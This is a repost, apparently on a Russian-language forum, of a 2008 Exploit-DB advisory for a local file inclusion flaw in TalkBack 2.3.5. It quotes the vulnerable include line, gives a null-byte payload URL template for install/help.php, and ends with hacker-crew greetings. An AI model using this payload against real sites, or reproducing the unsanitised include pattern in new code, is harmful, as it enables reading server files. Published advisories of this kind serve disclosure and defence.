Exploit TalkBack 2.3.5 - 'Language' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6148
Проверка EDB
  1. Пройдено
Автор
NOGE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-3371
Дата публикации
2008-07-28
Код:
=============================================================================================================

  [o] TalkBack 2.3.5 Local File Inclusion Vulnerability

       Software : TalkBack version 2.3.5
       Vendor   : http://www.scripts.oldguy.us/talkback
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com

=============================================================================================================

  [o] Vulnerable file

       install/help.php

        include "../language/{$_REQUEST['language']}.php";



  [o] Exploit

       http://localhost/[path]/install/help.php?language=[LFI]%00


=============================================================================================================

  [o] Greetz

       supported by irc.nob0dy.net
       skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke
       H312Y yooogy mousekill }^-^{ martfella
       okegay OoN_Gay pagay (sungguh penyembunyian sebuah karakter dibalik makna kata) /me brb ngakak..  :) 
 
=============================================================================================================

# milw0rm.com [2008-07-28]
 
Источник
www.exploit-db.com

Похожие темы